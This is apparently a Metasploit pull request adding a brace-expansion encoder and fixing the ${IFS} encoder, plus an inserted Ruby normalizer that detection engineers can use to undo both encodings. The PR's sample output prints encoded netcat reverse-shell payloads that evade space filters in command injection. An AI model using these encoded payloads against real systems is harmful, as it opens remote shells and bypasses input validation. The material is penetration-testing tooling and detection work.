
Add brace expansion encoder and update ${IFS} encoder #10516

Merged
merged 4 commits into from Aug 26, 2018

Conversation

wvu
Contributor

@wvu wvu commented Aug 23, 2018

Description

Brace expansion can be used as a whitespace encoder in supported shells.

wvu@kharak:~$ {echo,this,is,a,test}
this is a test
wvu@kharak:~$

Caveats

This encoder assumes that shell metacharacters like { and } will already be escaped or quoted in the unencoded payload. Note that you may not need to escape those metachars if used without special meaning.

For an example, consider xargs -I {}:

wvu@kharak:~$ xargs -I {} < /dev/null; echo $?
0
wvu@kharak:~$

Naturally, the shell you're injecting into needs to have brace expansion. bash is a common one, and sometimes /bin/sh is symlinked to it.

Verification Steps

  • Test cmd/ifs encoder for regressions
    • Test generated payloads
    • Test arbitrary strings
  • Test new cmd/brace encoder
    • Test generated payloads
    • Test arbitrary strings

Examples

wvu@kharak:~/metasploit-framework:feature/brace$ ./msfvenom -p cmd/unix/reverse_netcat_gaping -e cmd/brace -b "\x20" lhost=127.0.0.1
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/brace
cmd/brace succeeded with size 30 (iteration=0)
cmd/brace chosen with final size 30
Payload size: 30 bytes
{nc,127.0.0.1,4444,-e,/bin/sh}
wvu@kharak:~/metasploit-framework:feature/brace$ ^brace^ifs
./msfvenom -p cmd/unix/reverse_netcat_gaping -e cmd/ifs -b "\x20" lhost=127.0.0.1
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/ifs
cmd/ifs succeeded with size 48 (iteration=0)
cmd/ifs chosen with final size 48
Payload size: 48 bytes
nc${IFS}127.0.0.1${IFS}4444${IFS}-e${IFS}/bin/sh
wvu@kharak:~/metasploit-framework:feature/brace$
wvu@kharak:~/metasploit-framework:feature/brace$ echo -n "echo hello, world" | ./msfvenom -a cmd --platform unix -e cmd/brace -b "\x20" lhost=127.0.0.1
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/brace
cmd/brace succeeded with size 20 (iteration=0)
cmd/brace chosen with final size 20
Payload size: 20 bytes
{echo,hello\,,world}
wvu@kharak:~/metasploit-framework:feature/brace$ {echo,hello\,,world}
hello, world
wvu@kharak:~/metasploit-framework:feature/brace$
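
An added example, not code from this PR or from the framework itself: a small Ruby normalizer a detection engineer can run over captured command lines to undo the two whitespace encodings described above (brace expansion with backslash-escaped commas, and ${IFS}), so that a rule written against the plain command still matches the encoded form. Function names and the inputs in the comments are constructed for this example.

```ruby
# Parse the brace group opening at s[open]: returns [closing_index, alternatives],
# splitting on top-level unescaped commas, or nil if the brace is unmatched.
# Escaped characters (the encoder writes a literal comma as "\,") are skipped.
def parse_group(s, open)
  alts, cur, depth, i = [], +'', 0, open + 1
  while i < s.length
    c = s[i]
    if c == '\\'                      # keep the escape pair intact for now
      cur << c << s[i + 1].to_s
      i += 2
      next
    end
    depth += 1 if c == '{'
    if c == '}'
      return [i, alts << cur] if depth.zero?
      depth -= 1
    end
    if c == ',' && depth.zero?
      alts << cur
      cur = +''
    else
      cur << c
    end
    i += 1
  end
  nil
end

# Expand the leftmost brace group that holds a top-level comma, then recurse,
# which also covers adjacent groups such as {a,b}{c,d}. A group without a
# comma (the {} of "xargs -I {}" from the PR) stays a literal word, as in bash.
def brace_expand(s)
  i = 0
  while i < s.length
    if s[i] == '\\'
      i += 2
    elsif s[i] == '{' && (group = parse_group(s, i)) && group[1].length > 1
      close, alts = group
      return alts.flat_map { |a| brace_expand(s[0...i] + a + s[(close + 1)..-1]) }
    else
      i += 1
    end
  end
  [s]
end

# Brace expansion, then ${IFS} to a space, then quote removal so the encoder's
# "hello\," reads as "hello," again: "{nc,127.0.0.1,4444,-e,/bin/sh}" and
# "nc${IFS}127.0.0.1${IFS}4444${IFS}-e${IFS}/bin/sh" both normalize alike.
def normalize_command(cmd)
  brace_expand(cmd).join(' ').gsub(/\$\{IFS\}|\$IFS\b/, ' ').gsub(/\\(.)/, '\1')
end
```

Only unquoted, comma-separated brace groups are handled; sequence expressions like {1..5} and quoted strings are left untouched, so treat this as a first normalization pass rather than a full shell parser.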

@busterb
Member

busterb commented Aug 23, 2018

Looks pretty straightforward to me. Too bad Defcon 26 videos aren't up yet for linking in references!

@busterb busterb self-assigned this Aug 23, 2018

Acronyms can be capitalized as per the Ruby style guide.

@busterb
Member

busterb commented Aug 26, 2018

Release Notes

A new cmd/brace encoder module has been added to the framework. It allows you to encode payloads without spaces in bash using a simple technique. This PR also fixes some issues with the IFS shell payload encoder.

@wvu wvu deleted the feature/brace branch August 27, 2018 15:59
@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Sep 12, 2018